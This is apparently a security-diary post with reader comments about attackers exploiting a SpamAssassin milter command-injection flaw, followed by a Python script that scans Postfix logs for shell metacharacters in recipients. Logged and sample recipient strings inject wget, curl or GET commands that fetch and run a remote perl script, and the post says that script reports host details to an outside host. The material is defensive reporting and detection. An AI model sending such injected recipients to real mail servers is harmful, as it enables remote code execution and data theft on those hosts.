SpamAssassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://;perl p.txt:[] : User unknown in local recipient
       table; from=<> to=<root+:|wget
       hxxp:// : 1 Time(s)

Handler Bojan notes that the bad guys appear to have started actively exploiting the SpamAssassin milter vulnerability that was published last weekend (more details at

The perl script collects some information about the local host and tries to send it to on port 80 -- this host appears to be unreachable at the moment though.

Adrien de Beaupré


ISC Handler
Mar 15th 2010
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?

9 Posts
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
3 Posts
I have logged attempts to use curl as well.

rcpt to: root+:"|wget"

rcpt to: root+:"|wget"
rcpt to: root+:"|GET"
rcpt to: root+:"|curl"

5 Posts
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).

7 Posts
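A log check for the recipient pattern shown in the diary and in the comments above, as an added example (not code from the original post, the commenters, or the spamass-milter project). It assumes raw Postfix syslog lines that carry a to=<...> field; the sample lines, the client IPs and the example.invalid host are constructed.

```python
import re
from collections import Counter

# Recipient as logged by Postfix: to=<...> followed by another key=value or end of line.
TO_FIELD = re.compile(r"\bto=<(?P<rcpt>.*?)>(?=\s+\w+=|\s*$)")
CLIENT = re.compile(r"RCPT from \S*\[(?P<ip>[0-9a-fA-F.:]+)\]")
# Characters a shell interprets; '+' is left out because plus-addressing is legitimate.
SHELL_META = re.compile(r"[|;&`]|\$\(")


def suspicious_recipient(line):
    """Return (client_ip, recipient, sorted metacharacters) or None for a clean line."""
    m = TO_FIELD.search(line)
    if not m:
        return None
    rcpt = m.group("rcpt")
    hits = sorted(set(SHELL_META.findall(rcpt)))
    if not hits:
        return None
    c = CLIENT.search(line)
    return (c.group("ip") if c else "unknown", rcpt, hits)


def scan(lines):
    """Collect all suspicious recipients and count them per connecting client."""
    findings = [f for f in map(suspicious_recipient, lines) if f]
    return findings, Counter(ip for ip, _, _ in findings)


def _sample(ip, rcpt):
    # Constructed Postfix-style reject line (not taken from a real log).
    return (f"Mar 15 10:02:11 mx1 postfix/smtpd[4211]: NOQUEUE: reject: RCPT from "
            f"unknown[{ip}]: 550 5.1.1 <{rcpt}>: Recipient address rejected: User unknown "
            f"in local recipient table; from=<> to=<{rcpt}> proto=SMTP helo=<localhost>")


SAMPLE_LOG = [
    _sample("192.0.2.10", 'root+:"|wget hxxp://example.invalid/p.txt;perl p.txt"'),
    _sample("192.0.2.10", 'root+:"|curl hxxp://example.invalid/p.txt"'),
    _sample("198.51.100.7", "alice+lists@example.org"),
]

if __name__ == "__main__":
    findings, per_client = scan(SAMPLE_LOG)
    for ip, rcpt, meta in findings:
        print(f"{ip}\t{''.join(meta)}\t{rcpt}")
    for ip, n in per_client.most_common():
        print(f"{ip}: {n} suspicious RCPT(s)")
```

To run it against a real log, pass the file's lines to `scan()` in place of `SAMPLE_LOG`.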
